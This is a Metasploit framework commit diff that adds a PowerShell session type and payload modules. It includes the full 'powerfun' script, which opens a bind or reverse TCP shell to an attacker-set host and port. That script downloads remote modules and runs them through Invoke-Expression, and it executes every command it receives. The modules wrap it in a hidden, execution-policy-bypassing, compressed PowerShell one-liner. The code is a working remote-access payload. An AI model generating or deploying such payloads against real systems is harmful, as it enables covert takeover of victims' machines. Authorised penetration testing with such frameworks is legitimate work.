Lands rapid7#5194, merges in PowerShell session support & initial payloads

Author: HD Moore

data/exploits/powershell/powerfun.ps1

@@ -0,0 +1,59 @@
+# Powerfun - Written by Ben Turner & Dave Hardy
+
+function Get-Webclient 
+{
+    $wc = New-Object -TypeName Net.WebClient
+    $wc.UseDefaultCredentials = $true
+    $wc.Proxy.Credentials = $wc.Credentials
+    $wc
+}
+function powerfun 
+{ 
+    Param( 
+        [String]$Command,
+        [String]$Download
+    ) 
+    Process {
+    $modules = @(MODULES_REPLACE)  
+    if ($Command -eq "bind")
+    {
+        $listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
+        $listener.start()    
+        $client = $listener.AcceptTcpClient()
+    } 
+    if ($Command -eq "reverse")
+    {
+        $client = New-Object System.Net.Sockets.TCPClient("LHOST_REPLACE",LPORT_REPLACE)
+    }
+    $stream = $client.GetStream()
+    [byte[]]$bytes = 0..255|%{0}
+    if ($Download -eq "true")
+    {
+        ForEach ($module in $modules)
+        {
+            (Get-Webclient).DownloadString($module)|Invoke-Expression
+        } 
+    }
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
+    {
+        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
+        $data = $EncodedText.GetString($bytes,0, $i)
+        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
+
+        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
+        $x = ($error[0] | Out-String)
+        $error.clear()
+        $sendback2 = $sendback2 + $x
+
+        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
+        $stream.Write($sendbyte,0,$sendbyte.Length)
+        $stream.Flush()  
+    }
+    $client.Close()
+    $listener.Stop()
+    }
+}

lib/msf/base/sessions/powershell.rb

@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+require 'msf/base/sessions/command_shell'
+
+class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
+  #
+  # Execute any specified auto-run scripts for this session
+  #
+  def process_autoruns(datastore)
+
+    # Read the username and hostname from the initial banner
+    initial_output = shell_read(-1, 0.01)
+    if initial_output =~ /running as user ([^\s]+) on ([^\s]+)/
+      username = $1
+      hostname = $2
+      self.info = "#{username} @ #{hostname}"
+    else
+      self.info = initial_output.gsub(/[\r\n]/, ' ')
+    end
+
+    # Call our parent class's autoruns processing method
+    super
+  end
+  #
+  # Returns the type of session.
+  #
+  def self.type
+    "powershell"
+  end
+
+  #
+  # Returns the session description.
+  #
+  def desc
+    "Powershell session"
+  end
+end

modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb

@@ -0,0 +1,77 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/base/sessions/powershell'
+
+module Metasploit3
+
+  CachedSize = 1342
+
+  include Msf::Payload::Single
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
+      'Description'   => 'Interacts with a powershell session on an established socket connection',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'windows',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::PowerShell,
+      'RequiredCmd'   => 'generic',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+      register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+  end
+
+  def generate
+    lport = datastore['LPORT']
+    lhost = datastore['LHOST']
+
+    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
+    script_in = ""
+    ::File.open(template_path, "rb") do |fd|
+      script_in << fd.read(fd.stat.size)
+    end
+    script_in << "\npowerfun -Command bind"
+
+    mods = ''
+
+    if datastore['LOAD_MODULES']
+      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+      mods_array.collect(&:strip)
+      vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      mods_array.each {|m| vprint_good " #{m}"}
+      mods = "\"#{mods_array.join("\",\n\"")}\""
+      script_in << " -Download true\n"
+    end
+
+    script_in.gsub!('MODULES_REPLACE', mods)
+    script_in.gsub!('LPORT_REPLACE', lport.to_s)
+    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
+
+    script = Rex::Powershell::Command.compress_script(script_in)
+    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+  end
+
+end

modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb

@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/base/sessions/powershell'
+
+module Metasploit3
+
+  CachedSize = 1342
+
+  include Msf::Payload::Single
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
+      'Description'   => 'Interacts with a powershell session on an established socket connection',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'windows',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::PowerShell,
+      'RequiredCmd'   => 'generic',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+      register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+  end
+
+  def generate
+    lport = datastore['LPORT']
+    lhost = datastore['LHOST']
+
+    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
+    script_in = ""
+    ::File.open(template_path, "rb") do |fd|
+      script_in << fd.read(fd.stat.size)
+    end
+
+    script_in << "\npowerfun -Command reverse"
+
+    mods = ''
+
+    if datastore['LOAD_MODULES']
+      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+      mods_array.collect(&:strip)
+      vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      mods_array.each {|m| vprint_good " #{m}"}
+      mods = "\"#{mods_array.join("\",\n\"")}\""
+      script_in << " -Download true\n"
+    end
+
+    script_in.gsub!('MODULES_REPLACE', mods)
+    script_in.gsub!('LPORT_REPLACE', lport.to_s)
+    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
+
+    script = Rex::Powershell::Command.compress_script(script_in)
+    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+  end
+
+end

modules/payloads/singles/windows/powershell_bind_tcp.rb

@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/payload/windows/exec'
+require 'msf/base/sessions/powershell'
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
+
+  CachedSize = 1543
+
+  include Msf::Payload::Windows::Exec
+  include Rex::Powershell::Command
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
+      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Author'        =>
+        [
+          'Ben Turner', # benpturner
+          'Dave Hardy' # davehardy20
+        ],
+      'References'    =>
+        [
+          ['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::PowerShell,
+      ))
+
+    # Register command execution options
+    register_options(
+      [
+        OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
+      ], self.class)
+    # Hide the CMD option...this is kinda ugly
+    deregister_options('CMD')
+  end
+
+  #
+  # Override the exec command string
+  #
+  def command_string
+    lport = datastore['LPORT']
+
+    template_path = ::File.join( Msf::Config.data_directory, 'exploits', 'powershell','powerfun.ps1')
+    script_in = ""
+    ::File.open(template_path, "rb") do |fd|
+      script_in << fd.read(fd.stat.size)
+    end
+
+    script_in = File.read(template_path)
+    script_in << "\npowerfun -Command bind"
+
+    mods = ''
+
+    if datastore['LOAD_MODULES']
+      mods_array = datastore['LOAD_MODULES'].to_s.split(',')
+      mods_array.collect(&:strip)
+      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      mods_array.each {|m| vprint_good " #{m}"}
+      mods = "\"#{mods_array.join("\",\n\"")}\""
+      script_in << " -Download true\n"
+    end
+
+    script_in.gsub!('MODULES_REPLACE', mods)
+    script_in.gsub!('LPORT_REPLACE', lport.to_s)
+
+    script = Rex::Powershell::Command.compress_script(script_in)
+    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+
+  end
+end